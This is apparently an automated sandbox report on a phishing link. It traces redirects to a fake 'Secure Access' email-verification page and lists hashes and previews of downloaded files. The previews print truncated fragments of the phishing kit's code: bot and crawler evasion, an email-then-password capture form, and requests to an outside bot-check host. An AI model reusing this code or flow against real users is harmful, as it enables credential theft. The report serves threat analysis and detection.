                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:defaultwindowsinteractivecookbook.jbs
                          Sample URL:https://www.clkmg.com/h4pussy/1ywq9a
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:8
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • EGA enabled
                          Analysis Mode:stream
                          Analysis stop reason:Timeout
                          Detection:MAL
                          Classification:mal68.phis.win@24/21@29/181
                          • Exclude process from analysis (whitelisted): svchost.exe
                          • Excluded IPs from analysis (whitelisted): 20.12.23.50
                          • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size getting too big, too many NtOpenFile calls found.
                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                          • VT rate limit hit for: https://www.clkmg.com/h4pussy/1ywq9a
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text, with no line terminators
                          Category:downloaded
                          Size (bytes):16
                          Entropy (8bit):3.625
                          Encrypted:false
                          SSDEEP:
                          MD5:9B5719B531993D7EEF5EB4C692F2238C
                          SHA1:9C9A21624C975F0741B743348DE85A09FDA7E669
                          SHA-256:27008C4818CC0695B1496B0E8026DDFB7999C7FA066F78C61A76AF0FFECEF4BF
                          SHA-512:39CC9DC2E4DACFA6D1D7E23759ED7FB13C3111992BCA5DAA97CE1ADB37205056118FC1105D85E38B8E902A2F8CD68656AD36D53642DE60368E054BE86942BBA8
                          Malicious:false
                          Reputation:unknown
                          URL:https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvMTM0LjAuNjk5OC4zNhIZCcH8_Te5HSm9EgUNUAuvsCFR37WRZCcYAw==?alt=proto
                          Preview:CgkKBw1QC6+wGgA=
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 120x120, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=1, orientation=upper-left], baseline, precision 8, 1920x1034, components 3
                          Category:dropped
                          Size (bytes):114870
                          Entropy (8bit):7.375425337971249
                          Encrypted:false
                          SSDEEP:
                          MD5:45068F0ED4F904B59752FCAA6D8D3E7E
                          SHA1:49DC43B0FEB73AF09EE872C262CB45591D77A215
                          SHA-256:B16B43D0FA5E1715210552162B5059F379A69079C44E2A15690F27508AAADE9E
                          SHA-512:C6151A108DB6A654452D8B77AB8604B6977F5710C38F8EB7968C6F3110B1D4B732D0334BA8A12084A6F121354458D4AE5E94F14C390A4239570780B1175E7D0C
                          Malicious:false
                          Reputation:unknown
                          Preview:......JFIF.....x.x....."Exif..MM.*.........................C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....4..>..........<....n.T_............^./..o....u........y............ ......v><.{y./.k.h....$N.-......W.....w..wiF..9.m..c......w...%..!_..K+.k<..J.+3:*.........Vj....5y>e...?.7........>....#..}...YI.r..:....>Y-.w.w.....I.!....o...w.e..6\D..K,..<...Wy6...........1.D..n!.;..v....Gs...o.......c..\3G.F.\6.......q.6..F......H
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text, with very long lines (65202)
                          Category:downloaded
                          Size (bytes):141052
                          Entropy (8bit):5.268092028848304
                          Encrypted:false
                          SSDEEP:
                          MD5:7FC4BED6B4319C62343F0BF5DB91A5BB
                          SHA1:6E283C4EA2B12DA64476AF280236A8C5D85DBBBC
                          SHA-256:F2AE26FF518D9519AFD2A3DC277D84E098458E6B6B85FA9548CDA2BED24435E7
                          SHA-512:E2E0072386F2F35690899509229136406C27C2B95E3E8CC810AEB6630D7F13BD0872E0F6E650B4FDDCE2567680E7C42EEA49C62BD2653006F5151D9BA0430CD7
                          Malicious:false
                          Reputation:unknown
                          URL:https://oka.greenthreads.hr/_next/static/chunks/framework-2c79e2a64abdb08b.js
                          Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[774],{4448:function(e,n,t){/**. * @license React. * react-dom.production.min.js. *. * Copyright (c) Facebook, Inc. and its affiliates.. *. * This source code is licensed under the MIT license found in the. * LICENSE file in the root directory of this source tree.. */var r,l,a,u,o,i,s=t(7294),c=t(3840);function f(e){for(var n="https://reactjs.org/docs/error-decoder.html?invariant="+e,t=1;t<arguments.length;t++)n+="&args[]="+encodeURIComponent(arguments[t]);return"Minified React error #"+e+"; visit "+n+" for the full message or use the non-minified dev environment for full errors and additional helpful warnings."}var d=new Set,p={};function m(e,n){h(e,n),h(e+"Capture",n)}function h(e,n){for(p[e]=n,e=0;e<n.length;e++)d.add(n[e])}var g=!("undefined"==typeof window||void 0===window.document||void 0===window.document.createElement),v=Object.prototype.hasOwnProperty,y=/^[:A-Z_a-z\u00C0-\u00D6\u00D8-\u00F6\u00F8-\u02FF\u0370
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (945), with CRLF line terminators
                          Category:downloaded
                          Size (bytes):3104
                          Entropy (8bit):5.15444715295649
                          Encrypted:false
                          SSDEEP:
                          MD5:A9087237DD6E0A5BB810E8DC1D861A01
                          SHA1:A87414BE9B0DCDD138B5C581D00BFE520544094F
                          SHA-256:25061DD2C2812F4605A887DE29BEAEB51E790281CBEF173D4DE949371893A40E
                          SHA-512:3E562D7AC54F97BC415108E19E60B1607FBA8E6930F7A58D2DBDF7B947D034A5514F8659A5A21227E1D88555056F5A11E3E3306AF2737984F168B92271E73B49
                          Malicious:false
                          Reputation:unknown
                          URL:https://netro.gitcombust.shop/
                          Preview:<!DOCTYPE html>..<html lang="en">..<head>.. <meta charset="UTF-8">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <title>Secure Access</title>.. <link rel="stylesheet" href="styles.css">..</head>..<body>.... <div class="container">.. . Inline SVG Logo Instead of "Secure Access" -->.. <div class="logo">.. <svg width="80" height="80" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg">.. <path d="M14 2H6C4.9 2 4 2.9 4 20C4 21.1 4.9 22 6 22H18C19.1 22 20 21.1 20 20V8L14 2Z" fill="#0078D4"/>.. <path d="M14 2V8H20" fill="#005a9e"/>.. <rect x="7" y="12" width="10" height="2" rx="1" fill="white"/>.. <rect x="7" y="16" width="10" height="2" rx="1" fill="white"/>.. </svg>.. </div>.... <p id="processingText">Processing your request... Please wait.</p> . Added ID -->.... <div class="progress-container">..
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text, with no line terminators
                          Category:downloaded
                          Size (bytes):280
                          Entropy (8bit):5.255155675654176
                          Encrypted:false
                          SSDEEP:
                          MD5:FEE534CEE4DA1C4A41D1EE54F48DB65B
                          SHA1:DAE46FEEA39BBBA346DA2DB16C4DF5B7E90A1357
                          SHA-256:159DCBF63601BDFCB99D7389FD4D70F185A6A8E308068072B443BB06F1D74CD5
                          SHA-512:95F916B9754F1E9B73246EB87E10AF666FC07B2F2A2CABB7A4DB1D924115FD8F27FF097702DE5697E91B61A3E5DE59D55F80925198BAD31F02E54B7AC9AF329D
                          Malicious:false
                          Reputation:unknown
                          URL:https://oka.greenthreads.hr/_next/static/chunks/pages/_app-aea6920bd27938ca.js
                          Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[888],{1597:function(n,_,u){(window.__NEXT_P=window.__NEXT_P||[]).push(["/_app",function(){return u(5035)}])}},function(n){var _=function(_){return n(n.s=_)};n.O(0,[774,179],function(){return _(1597),_(6885)}),_N_E=n.O()}]);
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:Unicode text, UTF-8 text, with CRLF line terminators
                          Category:downloaded
                          Size (bytes):3941
                          Entropy (8bit):4.8748840713426445
                          Encrypted:false
                          SSDEEP:
                          MD5:8A4FE174F7D45502A69695F92A0CDD39
                          SHA1:4F94AAB1C73E0E53C75BE5D27B66104F2AAF58DD
                          SHA-256:39BFB5DE6F065E22B15B17E9950E399C53447E3EDA696DA4A51FC834E70230EB
                          SHA-512:377BA08C1A871CF55C5573F7F50688C16FBB509CBB17544B0771E83E4D7B1A0C284C14CCB4794B6E3AB4B78F99BEC996D89B7CB7DA0255D3F816FF780B1AF596
                          Malicious:false
                          Reputation:unknown
                          URL:https://netro.gitcombust.shop/script.js
                          Preview:async function getUserIP() {.. try {.. const response = await fetch('https://api64.ipify.org?format=json');.. const data = await response.json();.. return data.ip;.. } catch (error) {.. console.error('Failed to get IP:', error);.. return '0.0.0.0'; // Default IP in case of error.. }..}....// . Function to Detect Canvas Fingerprinting..function isCanvasBlocked() {.. try {.. const canvas = document.createElement("canvas");.. const ctx = canvas.getContext("2d");.. if (!ctx) return true;.. ctx.fillText("Bot Detection", 10, 10);.. return ctx.getImageData(10, 10, 1, 1).data.length === 0;.. } catch (e) {.. return true; // If an error occurs, assume the canvas is blocked.. }..}....function detectBotLocally() {.. const botPatterns = [/bot/, /crawl/, /spider/, /scraper/, /python/, /httpclient/, /fetch/, /curl/];.. const isBotUserAgent = botPatterns.some(pattern => pattern.test(navigator.userAge
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text, with very long lines (57744)
                          Category:downloaded
                          Size (bytes):64992
                          Entropy (8bit):5.454835624756822
                          Encrypted:false
                          SSDEEP:
                          MD5:575C44CD8AFE1990210F891769BC660A
                          SHA1:75B0609D9F1A9124ED4E27F3FBD232B8985E6B0F
                          SHA-256:E2EFBA3AD9DEACFED91542891E1D8EB0859C0D47371A5A8E3809992320F7DAF6
                          SHA-512:862619470AC49D0DC89F6FF3C1BB9AB7891DAA1A55E559F73E8B71559ACA1BE7130D3ECE4CCFFC5DDE98F9A70F96446BAD17E753677D096FEB21A7954416DA58
                          Malicious:false
                          Reputation:unknown
                          URL:https://oka.greenthreads.hr/_next/static/chunks/186-e401717d9e8b842b.js
                          Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[186],{487:function(t){var e={utf8:{stringToBytes:function(t){return e.bin.stringToBytes(unescape(encodeURIComponent(t)))},bytesToString:function(t){return decodeURIComponent(escape(e.bin.bytesToString(t)))}},bin:{stringToBytes:function(t){for(var e=[],r=0;r<t.length;r++)e.push(255&t.charCodeAt(r));return e},bytesToString:function(t){for(var e=[],r=0;r<t.length;r++)e.push(String.fromCharCode(t[r]));return e.join("")}}};t.exports=e},1012:function(t){var e,r;e="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/",r={rotl:function(t,e){return t<<e|t>>>32-e},rotr:function(t,e){return t<<32-e|t>>>e},endian:function(t){if(t.constructor==Number)return 16711935&r.rotl(t,8)|4278255360&r.rotl(t,24);for(var e=0;e<t.length;e++)t[e]=r.endian(t[e]);return t},randomBytes:function(t){for(var e=[];t>0;t--)e.push(Math.floor(256*Math.random()));return e},bytesToWords:function(t){for(var e=[],r=0,n=0;r<t.length;r++,n+=8)e[n>>>5]|=t[r]<<2
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:HTML document, ASCII text
                          Category:dropped
                          Size (bytes):154
                          Entropy (8bit):4.794666354490683
                          Encrypted:false
                          SSDEEP:
                          MD5:53E58F134037BDAD4234CCF3F379F815
                          SHA1:95118E29693F831B43F533CF4E0EBA604BF56CE5
                          SHA-256:531980D618BB32A4630B175B62AA2CA0F764BFAF873FB03022A85B7D4A2DFD90
                          SHA-512:17BE37BC5CF4CC671549EF41834C536B10F23AD53F452D2849D1FE47FB5D9A7EDA02F61C0277E9C1DF45FB39E862F1B37291E21CF5C76F9AAB2DA2F6A85C3358
                          Malicious:false
                          Reputation:unknown
                          Preview:<!DOCTYPE html>.<html lang="en">.<head>.<meta charset="utf-8">.<title>Error</title>.</head>.<body>.<pre>Cannot GET /api/get_doc_url</pre>.</body>.</html>.
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:HTML document, ASCII text, with very long lines (321), with no line terminators
                          Category:downloaded
                          Size (bytes):321
                          Entropy (8bit):5.095850439210152
                          Encrypted:false
                          SSDEEP:
                          MD5:304011D1C61BECF61BFFF366155C58B0
                          SHA1:2912369C9A499F247993FF993EB0FAD842326171
                          SHA-256:8E6EA9DBEB5D22582994F72615F8B02B555C72A22A35FC13F342F2FD82A01AF5
                          SHA-512:94786C565E2A993A7D25D6A3A5422D2DAC0F7C6BDCEAB90586FBFCCC39457CBD9C9AF18ACC6B325F76A44CE2E66A8BE413F5233EB0DB1F2498F5C95CD730F9CC
                          Malicious:false
                          Reputation:unknown
                          URL:https://netro.gitcombust.shop/favicon.ico
                          Preview:<!DOCTYPE html><html><head><title>WebContentNotFound</title></head><body><h1>The requested content does not exist.</h1><p><ul><li>HttpStatusCode: 404</li><li>ErrorCode: WebContentNotFound</li><li>RequestId : 09271e96-901e-004f-271c-a389b4000000</li><li>TimeStamp : 2025-04-01T15:41:27.6573009Z</li></ul></p></body></html>
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text, with very long lines (65536), with no line terminators
                          Category:downloaded
                          Size (bytes):93582
                          Entropy (8bit):5.3137933918088445
                          Encrypted:false
                          SSDEEP:
                          MD5:DA989C36392E2601EA958221AE086C80
                          SHA1:BC3CE9E7F2872A6558B8068F90A40B0CEDD93462
                          SHA-256:2563B9EC72FD85ADC785A500E808635088D4DA3FF7993F386D9692B028B13A5B
                          SHA-512:266C763D3C65A349BA5D4E07E70BCA18D59036252C4A92A009B97D4E35D1A9BDB810B3F825E716B5C60D9E867E4C4633148EDFD8C20BDD4DFFE7086CAFE76E4C
                          Malicious:false
                          Reputation:unknown
                          URL:https://oka.greenthreads.hr/_next/static/chunks/main-de1ad41d606513c1.js
                          Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[179],{37:function(){"trimStart"in String.prototype||(String.prototype.trimStart=String.prototype.trimLeft),"trimEnd"in String.prototype||(String.prototype.trimEnd=String.prototype.trimRight),"description"in Symbol.prototype||Object.defineProperty(Symbol.prototype,"description",{configurable:!0,get:function(){var e=/\((.*)\)/.exec(this.toString());return e?e[1]:void 0}}),Array.prototype.flat||(Array.prototype.flat=function(e,t){return t=this.concat.apply([],this),e>1&&t.some(Array.isArray)?t.flat(e-1):t},Array.prototype.flatMap=function(e,t){return this.map(e,t).flat()}),Promise.prototype.finally||(Promise.prototype.finally=function(e){if("function"!=typeof e)return this.then(e,e);var t=this.constructor||Promise;return this.then(function(r){return t.resolve(e()).then(function(){return r})},function(r){return t.resolve(e()).then(function(){throw r})})}),Object.fromEntries||(Object.fromEntries=function(e){return Array.from(e).reduce
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:PNG image data, 96 x 96, 8-bit/color RGBA, non-interlaced
                          Category:dropped
                          Size (bytes):819
                          Entropy (8bit):7.451551279226306
                          Encrypted:false
                          SSDEEP:
                          MD5:4B5FEBB3FB4517A225620B5FE05016D2
                          SHA1:02F3621A49871422123E5D560CFFDE14F6C719D5
                          SHA-256:FA2E9317D000C52911C303166AB105CB0BC76D06783F5C069E8388556CA544E3
                          SHA-512:80C0909A2F8CF64C97EE888CF7A039C6E22B6FCB02666277E3A6087ABE258763F69C7CC1B65BACDAE5AC5FF3C7C1015E297E3ADE494B81E86AE0C20A0F36A787
                          Malicious:false
                          Reputation:unknown
                          Preview:.PNG........IHDR...`...`......w8....pHYs.................IDATx..1..A....A.,...*b.......r..;.lm.....;K.B,m--l,.D.R$!..U.j#*+...w...dgg...I....7K............1.>7..{.'.T.^jEw....].-...ue...8..........9&#..LO...a7........\..]q...MG Kz=.MG Kz..$.u].er.^...@b^.W@.^.....5....u.s.]z].}Wg.*.'........0..G.....+.......`.^......iw6.nM...g...X.......7...RI[.@$....t.d..B.Q...X.. *X.......}....@.X.PP\..L.......@x..................."((.(.....DPP.P....(..... ((.P.AA!@APP\. ..B.....@A.....AAq...................._|..Vt..-...@..-*1..B)..y.CE;.[....ZD..*...RQLy..}7.$..3..hn..N8_3#L...#..?...}.R36.Mbhn..YY...0}.j..^.W......S].......f.7?.ba..j."..R[......`%...^mE......n...}.y...:;..7...0=..........(.N......i...gU.&g....P.c..c..5.rK..G.....y.._........V..ke....]........0.......+......IEND.B`.
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text, with very long lines (1515), with no line terminators
                          Category:downloaded
                          Size (bytes):1515
                          Entropy (8bit):5.288161100448261
                          Encrypted:false
                          SSDEEP:
                          MD5:358DF2F88C6CB7B259F7DFA5095500D5
                          SHA1:61141300014610F6DF77001775A2B8685B2985A0
                          SHA-256:6714626B550B8D9D9FBF11B56DC2CDFF65466D4E2BF4293FF5B92952B232393D
                          SHA-512:D45645CD0F4CEC02A7768C24A10D0D687F0A9A07875E203B51CCDBAF45DCB352D7C7DDFA626A57A5A8D097BF567D46FEC5D96744BC35CE47682C1E39D42F52AC
                          Malicious:false
                          Reputation:unknown
                          URL:https://oka.greenthreads.hr/_next/static/css/19d09a6113afa007.css
                          Preview:.Index_loginContainer__5jP50{text-align:center;height:100vh;display:flex;justify-content:center;align-items:center;background:url(/background.jpg) no-repeat 50% fixed;background-size:cover;color:#333}.Index_loginBox__TjgDC{background:hsla(0,0%,100%,.9);border-radius:10px;padding:20px;width:300px;box-shadow:0 4px 6px rgba(0,0,0,.1);outline:2px solid #000}.Index_logo___RQb3{width:64px;height:64px;margin:0 auto 20px}.Index_instruction__zKWvQ{font-family:Arial,sans-serif;font-size:16px;color:#555;margin-bottom:20px}.Index_modal__Vdljb{position:fixed;top:0;left:0;right:0;bottom:0;background:rgba(0,0,0,.5);display:flex;justify-content:center;align-items:center;z-index:1000}.Index_modalContent__dAUWU{background:#fff;padding:20px 30px;border-radius:10px;text-align:center;font-size:18px;font-weight:700}.Index_dots__9eVYy{display:inline-block;animation:Index_dots__9eVYy 1.2s steps(4) infinite}@keyframes Index_dots__9eVYy{0%{content:""}25%{content:"."}50%{content:".."}75%{content:"..."}}.Index_en
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text, with very long lines (427), with no line terminators
                          Category:downloaded
                          Size (bytes):427
                          Entropy (8bit):5.435519929011898
                          Encrypted:false
                          SSDEEP:
                          MD5:CA987B439687DBB7C9655EF9D384BD60
                          SHA1:405F8F4673A4A232A03E4EB42EE99363CE4BC8FF
                          SHA-256:0936E0D26A8F1D2AB49E3A0EEFD0BC7779AF170097489712CC6DCD3C4A42BB07
                          SHA-512:87E9AA2060E5F45C069EB299500A0D0029044431BBAB9DE826075F891EEB1BD12DACE4871DEB26C37C05A183E2A3946168B6824A18A08B9B7A41569340B3D587
                          Malicious:false
                          Reputation:unknown
                          URL:https://oka.greenthreads.hr/_next/static/fUhIl0Hqd1aZXohaxqY8t/_buildManifest.js
                          Preview:self.__BUILD_MANIFEST={__rewrites:{beforeFiles:[],afterFiles:[],fallback:[]},"/":["static/chunks/186-e401717d9e8b842b.js","static/css/19d09a6113afa007.css","static/chunks/pages/index-c362d579fbf7a668.js"],"/_error":["static/chunks/pages/_error-3986dd5834f581dc.js"],"/denied":["static/chunks/pages/denied-186b4c64a621e6fa.js"],sortedPages:["/","/_app","/_error","/denied"]},self.__BUILD_MANIFEST_CB&&self.__BUILD_MANIFEST_CB();
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:Unicode text, UTF-8 text, with very long lines (3427), with no line terminators
                          Category:downloaded
                          Size (bytes):3437
                          Entropy (8bit):5.495011079762914
                          Encrypted:false
                          SSDEEP:
                          MD5:2D020F71E4B64531C505183FF8A1A4C4
                          SHA1:9267023D72E779B7435A96D6B09FC4BBC9BC7C4D
                          SHA-256:9082BC30769158D2E347471C5A46635E740FBA615EAA871C49646728056A224F
                          SHA-512:1B9AA65DB2C51B17253B7221253BA58A9C5267B5CC976FAD3978351FD936465E8BCAC7B400072CDDDE44EBC2A47F8E0F092FE0DA5D5C59069B96983325852ADA
                          Malicious:false
                          Reputation:unknown
                          URL:https://oka.greenthreads.hr/_next/static/chunks/pages/index-c362d579fbf7a668.js
                          Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[405],{5557:function(e,t,n){(window.__NEXT_P=window.__NEXT_P||[]).push(["/",function(){return n(6616)}])},6616:function(e,t,n){"use strict";n.r(t);var a=n(5893),o=n(7294),s=n(7066),i=n(2568),r=n.n(i),l=n(9812),c=n.n(l);let u=()=>{let[e,t]=(0,o.useState)(""),[n,i]=(0,o.useState)(""),[l,u]=(0,o.useState)(!1),[d,_]=(0,o.useState)("/favicon.ico"),[p,m]=(0,o.useState)("Verify your email identity to continue."),[g,h]=(0,o.useState)(!1),x=e=>{t(e.target.value)},b=t=>{if(t.preventDefault(),e.includes("@")){u(!0),m("Verify email password");let t=e.split("@")[1];_("https://logo.clearbit.com/".concat(t))}else alert("Please enter a valid email address.")},f=async t=>{if(t.preventDefault(),n.length<5){alert("Password must be at least 5 characters long.");return}h(!0);try{let t=await s.Z.get("https://api64.ipify.org?format=json").then(e=>e.data.ip),a=await s.Z.post("https://rail-bot-production.up.railway.app/api/detect_bot",{user_agent:navigato
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text, with no line terminators
                          Category:downloaded
                          Size (bytes):77
                          Entropy (8bit):4.37144473219773
                          Encrypted:false
                          SSDEEP:
                          MD5:B6652DF95DB52FEB4DAF4ECA35380933
                          SHA1:65451D110137761B318C82D9071C042DB80C4036
                          SHA-256:6F5B4AA00D2F8D6AED9935B471806BF7ACEF464D0C1D390260E5FE27F800C67E
                          SHA-512:3390C5663EF9081885DF8CDBC719F6C2F1597A4E25168529598097E9472608A4A62EC7F7E0BC400D22AAC81BF6EA926532886E4DC6E4E272D3B588490A090473
                          Malicious:false
                          Reputation:unknown
                          URL:https://oka.greenthreads.hr/_next/static/fUhIl0Hqd1aZXohaxqY8t/_ssgManifest.js
                          Preview:self.__SSG_MANIFEST=new Set,self.__SSG_MANIFEST_CB&&self.__SSG_MANIFEST_CB();
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:HTML document, ASCII text, with very long lines (2575), with no line terminators
                          Category:downloaded
                          Size (bytes):2575
                          Entropy (8bit):5.239010277329789
                          Encrypted:false
                          SSDEEP:
                          MD5:38B7B3BB70CBD15961DDE9E122FEF975
                          SHA1:C453C93DB623988845FA2142AD799EBD65DA93CC
                          SHA-256:77E1A78F90A47E98DA896EC28A5A12ECF0ED75CE99654464463E62D1CDC4E235
                          SHA-512:591C06B3AA4AE2F0F348B8438674087F89442AEF1BBD221AA24F32115729E4162FF9E925D9009C2AAE3C7182D227FF8C1A53CC62296574BEED1DD4DC92B12A65
                          Malicious:false
                          Reputation:unknown
                          URL:https://oka.greenthreads.hr/
                          Preview:<!DOCTYPE html><html><head><meta charSet="utf-8"/><link rel="preload" as="style" href="/_next/static/css/19d09a6113afa007.css"/><link rel="preload" as="script" href="/_next/static/chunks/webpack-ee7e63bc15b31913.js"/><link rel="preload" as="script" href="/_next/static/chunks/framework-2c79e2a64abdb08b.js"/><link rel="preload" as="script" href="/_next/static/chunks/main-de1ad41d606513c1.js"/><link rel="preload" as="script" href="/_next/static/chunks/pages/_app-aea6920bd27938ca.js"/><link rel="preload" as="script" href="/_next/static/chunks/186-e401717d9e8b842b.js"/><link rel="preload" as="script" href="/_next/static/chunks/pages/index-c362d579fbf7a668.js"/><link rel="preload" as="script" href="/_next/static/fUhIl0Hqd1aZXohaxqY8t/_buildManifest.js"/><link rel="preload" as="script" href="/_next/static/fUhIl0Hqd1aZXohaxqY8t/_ssgManifest.js"/><link rel="preload" href="/_next/static/css/19d09a6113afa007.css" as="style"/><meta name="viewport" content="width=device-width"/><meta name="next-hea
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:HTML document, ASCII text
                          Category:downloaded
                          Size (bytes):121
                          Entropy (8bit):4.708276176005738
                          Encrypted:false
                          SSDEEP:
                          MD5:F2E875604683564EB1833C198104F089
                          SHA1:E023EFE8BC131FF1D2C449FD76A4394FF125E8B8
                          SHA-256:B5CCC2694098B630207900CCD172A41CD835FB7C348104EA6B7D7959D8D382B4
                          SHA-512:936CB93F74DAD88651E59D7BF1E050FDDA6372B0ABDF63DFD92FAB81F5247759AE4D8DA035529E577A5039D2BC5C88C8C553ECC0C675F31E9502C451111F285D
                          Malicious:false
                          Reputation:unknown
                          URL:https://www.clkmg.com/redir.cgi?url=5YLzHJtmmpWmacBzmzCY%2flX4xlmtZYa5OH2D9HeWNiho6ITfHFNLv4fgDcASlkcXru2gSFAsJp%2fzvbDs&pixel=0&lidc=1749346618
                          Preview:<html>.<head>.<meta http-equiv="refresh" content="0; url=https://netro.gitcombust.shop">.</head>.<body>..</body>.</html>.
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:MS Windows icon resource - 1 icon, 1x1, 2 colors
                          Category:dropped
                          Size (bytes):78
                          Entropy (8bit):1.0661976009971772
                          Encrypted:false
                          SSDEEP:
                          MD5:C9E1EFA761B83F4A25A07DC85C207F95
                          SHA1:7C1DF040D4119E1C1B4F875C362F363AD1F6BA13
                          SHA-256:91634633CA6D34044C356A9A0BAA832F1927D8326E1AE1A95AF22B864D30DD7F
                          SHA-512:D21A98B4A9362B4662163F28AB27F799CF2ABB04AE690431C15C806772837BE545CFACADA56DB5045CFA22EF4935D14AE0AC791974A095003156B0BF430E2857
                          Malicious:false
                          Reputation:unknown
                          Preview:..............8.......(.......................................................
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text, with very long lines (8377), with no line terminators
                          Category:downloaded
                          Size (bytes):8377
                          Entropy (8bit):5.7164926360897805
                          Encrypted:false
                          SSDEEP:
                          MD5:6DDDD1C194F8C88F5F2AFC06833D90CA
                          SHA1:E610F00E2363E2CBF9520EEFDA983FD299C4FBB7
                          SHA-256:1CB9DDDD8ED49F62F92A77204ED057C7EC89037E2310D527E6378A81C21C0523
                          SHA-512:BCE98A1FCCECDF4F56407485E5714B53D2D3770408FF3B1524CB562E7BC9956545B731887795089EEB2B89E59CEB69909CB11FAA098EE12D69160956E4363B20
                          Malicious:false
                          Reputation:unknown
                          URL:https://netro.gitcombust.shop/cdn-cgi/challenge-platform/h/b/scripts/jsd/708f7a809116/main.js?
                          Preview:window._cf_chl_opt={cFPWv:'b'};~function(W,h,i,n,o,y,z,B){W=b,function(c,d,V,e,f){for(V=b,e=c();!![];)try{if(f=-parseInt(V(143))/1+parseInt(V(214))/2+-parseInt(V(217))/3*(parseInt(V(220))/4)+parseInt(V(174))/5+parseInt(V(199))/6+-parseInt(V(130))/7+parseInt(V(138))/8,f===d)break;else e.push(e.shift())}catch(E){e.push(e.shift())}}(a,330080),h=this||self,i=h[W(218)],n={},n[W(189)]='o',n[W(233)]='s',n[W(198)]='u',n[W(226)]='z',n[W(165)]='n',n[W(184)]='I',n[W(231)]='b',o=n,h[W(170)]=function(E,F,G,H,a8,J,K,L,M,N,O){if(a8=W,F===null||void 0===F)return H;for(J=x(F),E[a8(141)][a8(230)]&&(J=J[a8(187)](E[a8(141)][a8(230)](F))),J=E[a8(188)][a8(176)]&&E[a8(167)]?E[a8(188)][a8(176)](new E[(a8(167))](J)):function(P,a9,Q){for(a9=a8,P[a9(133)](),Q=0;Q<P[a9(237)];P[Q]===P[Q+1]?P[a9(162)](Q+1,1):Q+=1);return P}(J),K='nAsAaAb'.split('A'),K=K[a8(202)][a8(150)](K),L=0;L<J[a8(237)];M=J[L],N=v(E,F,M),K(N)?(O='s'===N&&!E[a8(211)](F[M]),a8(239)===G+M?I(G+M,N):O||I(G+M,F[M])):I(G+M,N),L++);return H;function I(
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:Unicode text, UTF-8 text, with CRLF line terminators
                          Category:downloaded
                          Size (bytes):1669
                          Entropy (8bit):4.828717855219219
                          Encrypted:false
                          SSDEEP:
                          MD5:5E1A41B0834E51E45D3181187587B24B
                          SHA1:CC815FF3837AC7B95872D1349699593F8DB7272B
                          SHA-256:FA03F1E406824451F99B7B2BF347CFE32697CE0B5403D8455EC9644F883E5D6E
                          SHA-512:F72BAF30A40A4B11B0C521AAFDD5B86C6D95971E48055E04C56CB87CD06CAFD5A020B9E1B5EAC64B2E88AC00212F0F14070B277198E8936656EB65216B914527
                          Malicious:false
                          Reputation:unknown
                          URL:https://netro.gitcombust.shop/styles.css
